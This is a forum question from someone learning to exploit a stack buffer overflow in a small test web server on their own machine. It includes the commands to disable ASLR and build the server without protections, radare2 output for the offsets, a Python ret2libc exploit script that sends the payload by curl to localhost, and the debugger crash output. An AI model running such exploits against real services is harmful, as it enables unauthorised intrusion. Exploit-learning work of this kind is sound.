# How to properly pack address into bytes to overwrite EIP register

Tags: exploit, buffer-overflow, shellcode

I'm learning how to exploit a tiny web server based on a well written post here: https://blog.coffinsec.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html

I am very close to successfully exploiting it, but I am stuck on properly packing the `libc`'s `exit` function address into the byte format to overwrite the `EIP` register and return to it.

---

Here are the exact steps I did to perform this exploit (as the webpage above omits few details, I figure this may help reproduce if anyone wishes to try as well):

1. Use `radare2` to get the necessary offset/addresses

```
~/Downloads/tiny-web-server (master*) » echo 0 | sudo tee /proc/sys/kernel/randomize_va_space    

~/Downloads/tiny-web-server (master*) » gcc -static -Wall -m32 -z noexecstack -fno-stack-protector -o tiny-noexec tiny.c  

~/Downloads/tiny-web-server (master*) » r2 ./tiny-noexec                                                                                      
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
 -- scp ~/.idapro/ida.key radare.org:/var/www/radare.org/pub/losers/
[0x08049ce0]> aaa
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Recovering variables
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods
INFO: Recovering local variables (afva)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
[0x08049ce0]> 
[0x08049ce0]> afl | grep process
0x0804ab04   13    386 sym.process
[0x08049ce0]> 
[0x08049ce0]> s 0x0804ab04
[0x0804ab04]> 
[0x0804ab04]> afv
arg int32_t arg_8h @ ebp+0x8
arg int32_t arg_ch @ ebp+0xc
var int32_t var_4h @ ebp-0x4
var int32_t var_ch @ ebp-0xc
var signed int fildes @ ebp-0x10
var int32_t var_14h @ ebp-0x14
var int32_t var_18h @ ebp-0x18
var int32_t var_1ch @ ebp-0x1c
var int32_t var_20h @ ebp-0x20
var int32_t var_220h @ ebp-0x220
var int32_t var_24ch @ ebp-0x24c
var int32_t var_268h @ ebp-0x268
var void * buf @ ebp-0x278
[0x0804ab04]> 
[0x0804ab04]> is | grep -wi 'exit'
2454 0x00009880 0x08051880 GLOBAL FUNC   33        exit
[0x0804ab04]>
```

---

2. Now, I use this information in my updated Python script (website uses Python2, so I updated it to support Python3):

```
#!/usr/bin/env python
## tiny-web-server x86 ret2libc exit() exploit - Ubuntu 16.04
from struct import pack
from os import system
from sys import argv
from pwn import *

buf_size = 0

# Allow for custome buffer size setting
if len(argv) != 2:
    buf_size = 538
else:
    buf_size = argv[1]

filler = b"A"*int(buf_size)
libc_addr = 0x08051880
exit_addr = p32(libc_addr, endian='little')

# Build the payload
payload = filler + exit_addr
print(payload, exit_addr)

# Send payload 11 times, 10 for each child process and 1 for the parent
for i in range(11):
    print("Sending payload of total length {}".format(len(payload)))
    system("/usr/bin/curl localhost:9999/\""+str(payload)+"\"")
```

**Now, here is the question**. I'm using the following code to pack the address into bytes format:

```
libc_addr = 0x08051880
exit_addr = p32(libc_addr, endian='little')
```

but when I successfully overflow the `EIP` register, it looks like this:

```
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs
accept request, fd is 4, pid is 950346
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs
accept request, fd is 4, pid is 950347
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs
accept request, fd is 4, pid is 950348
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs
accept request, fd is 4, pid is 950349
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs
accept request, fd is 4, pid is 950350
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs
accept request, fd is 4, pid is 950344
0.0.0.0:0 404 - b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQs

Thread 2.1 "tiny-noexec" received signal SIGSEGV, Segmentation fault.
[Switching to process 950344]
0x3530785c in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────────
*EAX  0x227
*EBX  0x3038785c ('\\x80')
 ECX  0x0
 EDX  0x0
*EDI  0x80481f8 ◂— 0x0
*ESI  0xffffc3b0 ◂— 0x1
*EBP  0x3831785c ('\\x18')
*ESP  0xffffc240 ◂— "\\x08'"
*EIP  0x3530785c ('\\x05')
────────────────────────────────────────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────────
Invalid address 0x3530785c
```

I'm not too sure how to describe what is happening, but basically, bytes that I'm sending through `curl` are being understood as the `string`, and I am unable to properly overflow the `EIP` with the *address* of `exit` function to make the exploit successfully work?

Therefore, what is the proper way to "pack" address into bytes format so that I can overwrite the `EIP` register with an intended address? As I'm trying to access a gibberish address converted from the string. I tried everything I could think of at the moment, such as converting `hex` into `ASCII` format, etc.